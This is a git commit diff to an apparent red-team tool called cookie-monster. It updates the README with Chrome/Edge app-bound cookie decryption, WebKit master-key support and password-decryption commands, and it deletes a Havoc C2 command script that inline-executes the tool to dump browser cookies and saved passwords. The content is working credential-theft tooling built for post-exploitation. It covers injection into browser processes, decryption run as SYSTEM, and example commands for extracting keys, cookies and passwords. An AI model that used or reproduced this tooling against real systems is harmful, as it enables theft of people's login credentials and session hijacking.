removed Resolver function, only using DFR to resolve APIs. Updated readme to reflect webkit master key decryption support

This commit is contained in:
KingOfTheNOPs
2025-11-03 16:57:58 +00:00
parent bc9f139fe7
commit 3d9b40720c
2 changed files with 11 additions and 73 deletions
+11 -3
View File
@@ -7,8 +7,10 @@ Once the Cookies/Login Data file(s) are downloaded, the python decryption script
Chrome & Edge 127+ Updates: new chromium browser cookies (v20) use the app bound key to encrypt the cookies. As a result, this makes retrieving the app_bound_encrypted_key slightly more difficult. Thanks to [snovvcrash](https://gist.github.com/snovvcrash/caded55a318bbefcb6cc9ee30e82f824) this process can be accomplished without having to escalate your privileges. The catch is your process must be running out of the web browser's application directory. i.e. must inject into Chrome/Edge or spawn a beacon from the same application directory as the browser.
Latest update allows you to decrypt cookies as SYSTEM and without having to inject into the browser process! Shoutout to @sdemius for the discovering how to decrypt the Chrome's [PostProcessData](https://source.chromium.org/chromium/chromium/src/+/main:chrome/elevation_service/elevator.cc;l=216;bpv=1) function and @b1scoito [explanation](https://github.com/moonD4rk/HackBrowserData/issues/431#issuecomment-2606665195)! Chrome 137+ changed the PostProcessData() function once again, shoutout to [@runassu](https://github.com/runassu/chrome_v20_decryption) for figuring it out!
Decrypt cookies as SYSTEM and without having to inject into the browser process! Shoutout to @sdemius for the discovering how to decrypt the Chrome's [PostProcessData](https://source.chromium.org/chromium/chromium/src/+/main:chrome/elevation_service/elevator.cc;l=216;bpv=1) function and @b1scoito [explanation](https://github.com/moonD4rk/HackBrowserData/issues/431#issuecomment-2606665195)! Chrome 137+ changed the PostProcessData() function once again, shoutout to [@runassu](https://github.com/runassu/chrome_v20_decryption) for figuring it out!
Latest update added decryption of Webkit Master Key thanks to @M1ndo. The master key is automatically decrypted along side the app bound key. To utilize it, add the key to the Python decrypt script. Primarily see this key used when roaming profiles are in use, stored passwords in Edge, or older stored passwords.
## BOF Usage
```
Usage: cookie-monster [--chrome || --edge || --system <Local State File Path> <PID> || --firefox || --chromeCookiePID <PID> || --chromeLoginDataPID <PID> || --edgeCookiePID <PID> || --edgeLoginDataPID <PID> ] [--cookie-only] [--key-only] [--login-data-only] [--copy-file "C:\Folder\Location\"]
@@ -62,6 +64,8 @@ options:
-f FILE, --file FILE Location of the database file
--chrome-aes-key CHROME_AES_KEY
Chrome AES Key
-mk MASTER_KEY, --master-key MASTER_KEY
Old key used in v10 passwords
```
Examples:
@@ -98,7 +102,11 @@ Import cookies JSON file with https://cookie-editor.com/
Decrypt Chome/Edge Passwords File
```
python .\decrypt.py -k "\xec\xfc...." -o passwords ChromePasswords.db
python3 decrypt.py -o passwords -f EdgePasswords.db -k '\xf9\x...' -mk '\xf3\x..'
URL: https://test.com/
Username: adgf
Password: pass
Results Example:
-----------------------------------
-70
View File
@@ -1,70 +0,0 @@
#!/usr/bin/env python3
from havoc import Demon, RegisterCommand
def CookieMonster(demon_id, *args):
task_id: str = None
demon: Demon = None
packer: Packer = Packer()
# Get the agent instance based on demon ID
demon = Demon(demon_id)
Browser: str = ""
Browser_Path: str = ""
Cookies_only: bool = False
Passwords_only: bool = False
Key_only: bool = False
Browser_pid: int = 0
BrowserCookie_pid: int = 0
BrowserPassword_pid: int = 0
if args:
Browser = str(args[0]) if len(args) > 0 and args[0] is not None else Browser
Browser_Path = str(args[1]) if len(args) > 1 and args[1] is not None else Browser_Path
try:
Browser_pid = int(args[2]) if len(args) > 2 and args[2] is not None and str(args[2]).lstrip('-').isdigit() else Browser_pid
BrowserCookie_pid = int(args[6]) if len(args) > 6 and args[6] is not None and str(args[6]).lstrip('-').isdigit() else BrowserCookie_pid
BrowserPassword_pid = int(args[7]) if len(args) > 7 and args[7] is not None and str(args[7]).lstrip('-').isdigit() else BrowserPassword_pid
except (ValueError, TypeError):
Browser_pid = Browser_pid # Keep default if conversion fails
BrowserCookie_pid = BrowserCookie_pid # Keep default if conversion fails
BrowserPassword_pid = BrowserPassword_pid # Keep default if conversion fails
Cookies_only = str(args[3]).lower() == 'true' if len(args) > 3 and args[3] is not None else Cookies_only
Passwords_only = str(args[4]).lower() == 'true' if len(args) > 4 and args[4] is not None else Passwords_only
Key_only = str(args[5]).lower() == 'true' if len(args) > 5 and args[5] is not None else Key_only
packer.addstr(Browser)
packer.addstr(Browser_Path)
packer.addint(Browser_pid)
packer.addbool(Cookies_only)
packer.addbool(Passwords_only)
packer.addbool(Key_only)
packer.addint(BrowserCookie_pid)
packer.addint(BrowserPassword_pid)
task_id = demon.ConsoleWrite(demon.CONSOLE_TASK, "Tasked demon to dump passwords/cookies")
demon.InlineExecute(task_id, "go", "./cookie-monster.o", packer.getbuffer(), False)
return task_id
RegisterCommand(
CookieMonster,
"",
"cookie-monster",
"Extract and dump saved cookies/passwords from browsers (Chrome, Edge, Firefox, Brave, etc.)",
0,
"<OPT:Browser> <OPT:Browser_Path> <OPT:Browser_Pid> <OPT:Cookies_Only> <OPT:Passwords_Only> <OPT:Key_Only> <OPT:BrowserCookiePID> <OPT:BrowserPasswordPID>",
"""
cookie-monster - Find Browsers And Extract All Data
cookie-monster chrome - Extract data from Chrome (default profile)
cookie-monster edge - Extract data from Edge
cookie-monster firefox - Extract data from Firefox
cookie-monster "" "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Local State" 9999 - Extract from custom browser profile path as system ( Make sure to provide browser PID for impersonation )
cookie-monster chrome "" 0 true - Extract only cookies from Chrome
cookie-monster firefox - Extract passwords and cookies from Firefox
cookie-monster chrome "" 0 false false true - Extract only the key from chrome
cookie-monster chrome "" 0 false false true - Extract only the key from chrome
cookie-monster chrome "" 0 false false true 0 9999 - Extract only the key from chrome use PID
cookie-monster chrome "" 0 true true true 9999 0 - Extract everything from chrome use PID
"""
)